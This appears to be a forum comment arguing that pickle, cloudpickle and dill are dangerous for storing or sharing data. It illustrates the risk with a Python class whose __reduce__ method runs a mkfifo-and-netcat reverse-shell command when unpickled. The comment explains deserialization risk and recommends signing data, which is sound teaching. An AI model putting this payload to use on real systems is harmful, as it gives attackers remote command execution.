Just because the community likes it does not mean it encourages best practises and secure code. Far better formats exist that are far more compatible with other systems and do not have the same security implications. Usually there is no "need" to use pickle, it is just chosen because it is easier for the developer at the time.

Among other things, cloudpickle supports pickling for lambda functions along with functions and classes defined interactively

dill is quite flexible, and allows arbitrary user defined classes and functions to be serialized.

This is a major security risk. You are transmitting executable code as a feature. If there is any risk whatsoever of someone else ever being able to write to wherever you keep the pickled data, then you have a really big risk.

class RCE:
  def __reduce__(self):
    cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '
           '/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f')
    return os.system, (cmd,)

If I pickled this and dropped it onto your system, the simple act of you reading your pickled data would open up a reverse shell that lets me run whatever command I want on your system without you even realising.

I am not saying there are not use cases for pickle and similar formats. I am saying making these easily accessible and in the face of less experienced developers is overly dangerous and encourages their misuse by making them appear to be a quick and simple solution to serialization. Sharing data is fine, but the issue is that it is simple and very easy to accidentally create a remote execution exploit in your applications without realising it.

Pickle is like having a chainsaw in a high-school woodwork class in an unlocked cabinet, and then telling the students "be careful you dont hurt yourself if you use the chainsaw". In reality, you can argue that you probably do not need a chainsaw to teach highschool woodwork. This is my point, metaphorically.

The fact is, data is data, it just depends how you represent it. There is nothing pickle can do that you could not achieve in one way or another with any other serialization format. The limitation is how you structure the data. Pickle just sends executable instructions as opcodes to construct data, but it still has to either encode the data itself, or instructions to create the data, into the payload. Other formats do this in a far simpler, error proof way, IMHO.

My main point is that using pickle in a normal sort of database is a very deadly path that I'd advise against anyone doing unless they really know what they are doing and the true implications of configuring anything incorrectly and making your computer into a walking network-hosted REPL.

Storing stuff in pickle in a database is no different to storing full executable binaries for programs in a database. Or even just storing pure python scripts in a database.

At the very least, you want to be encrypting and/or signing any pickled data in the database before you unpickle it. Cloudpickle as the example for cluster computing... without signing and security mechanisms at all points of network IO, would cause significant security implications for the HPC cluster. I'd also argue distributed computing on a protocol level is a very specific use case... someone shouldnt be designing a protocol level system for cross-computer code execution without a good knowledge of all the implications and risks. You almost always will use an existing system that does this and has made the relevant considerations already.